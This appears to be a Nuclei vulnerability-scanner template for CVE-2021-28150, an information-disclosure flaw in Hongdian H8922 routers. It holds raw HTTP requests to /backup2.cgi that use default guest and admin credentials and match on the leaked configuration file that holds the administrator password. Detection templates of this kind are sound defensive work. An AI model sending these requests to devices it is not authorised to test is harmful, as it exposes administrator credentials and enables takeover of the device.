id: CVE-2021-28150 info: name: Hongdian H8922 3.0.5 - Information Disclosure author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. impact: | Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users. remediation: | Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 - https://github.com/SexyBeast233/SecBooks - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00253 epss-percentile: 0.6512 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian product: h8922_firmware tags: cve2021,cve,hongdian,exposure http: - raw: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream" - type: word part: body words: - "CLI configuration saved from vty" - "service webadmin" - type: status status: - 200 # digest: 4a0a00473045022028bc49aed0dad70ffa655f7fa36fda9a12a2f1f64120ec110f2b6a4b9bc6e701022100aa4a3250ab4373785c6a72a5f0c696f99342c751e8d67ebca79254dbebae9f3c:922c64590222798bb761d5b6d8e72950